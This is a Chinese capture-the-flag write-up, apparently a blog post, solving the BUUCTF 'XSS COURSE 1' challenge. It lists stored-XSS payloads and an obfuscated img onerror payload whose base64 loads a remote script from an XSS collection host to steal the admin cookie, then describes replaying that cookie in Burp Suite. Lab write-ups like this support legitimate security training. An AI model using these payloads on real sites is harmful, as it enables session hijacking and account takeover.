61,【1】BUUCTF WEB BUU XSS COURSE 11

进入靶场

左边是吐槽,右边是登录,先登录试试

admin 123456

admiin'# 123456

admin"# 123456

不玩了,先去回顾下xss

回顾完就很尴尬了,我居然用SQL的知识去做xss的题

重来

吐槽这里有一个输入框,容易出现存储型xss漏洞

常见的xss payload如下:

<script>alert(1)</script>

"><script>alert(1)</script><"

<img src=# onerror=alert(1)>

<svg onload=alert(1)>

都试试

1,<script>alert(1)</script>

访问的时候什么都没有,失败

2,"><script>alert(1)</script><"

根据以上两次尝试,知script被过滤了

3,<img src=# onerror=alert(1)>

出现弹窗1,注入成功

进入xss测试平台XSS平台-XSS测试网站-仅用于安全免费测试

之前没用过,先注册

登录成功

点击左边的创建项目,随便写一个名称

再点击左边的我的项目,右上角的查看配置代码

复制了这个

<img src=c onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtib2R5LmFwcGVuZENoaWxkKHMpO3Muc3JjPScvL3hzLnBlLzV6Vyc7'))>

但是我的xss平台项目里一直不显示记录(很崩溃啊,想换其他的xss平台,结果都被禁了)

不过得到记录后便会知道backend/admin.php和管理员cookie

出现这个页面是我没改cookie

可是我也不知道cookie呀

改cookie就用BP抓包,发送到重放器,在请求里改

就知道flag了

相关推荐
wang6021252181 分钟前
FastAPI框架为什么在启动时建表
数据库
男孩李2 分钟前
linux下如何执行postgres数据库的sql文件
数据库·sql·postgresql
zwjapple7 分钟前
MySQL SQL 面试核心考点与注意事项总结
数据库·sql·mysql
乐韵天城7 分钟前
SpringBoot中如何手动开启数据库事务
数据库·spring boot
05大叔13 分钟前
Spring Day02
数据库·sql·spring
默默前行的虫虫19 分钟前
nicegui中多次调用数据库操作总结
数据库·python
旧梦吟20 分钟前
脚本网站 开源项目
前端·web安全·网络安全·css3·html5
鸽鸽程序猿25 分钟前
【Redis】事务
数据库·redis·缓存
北极糊的狐29 分钟前
按钮绑定事件达成跳转效果并将树结构id带入子页面形成参数完成查询功能并将返回的数据渲染到页面上2022.5.29
前端·javascript·vue.js
幽络源小助理29 分钟前
幽络源二次元分享地址发布页源码(HTML) – 源码网免费分享
前端·html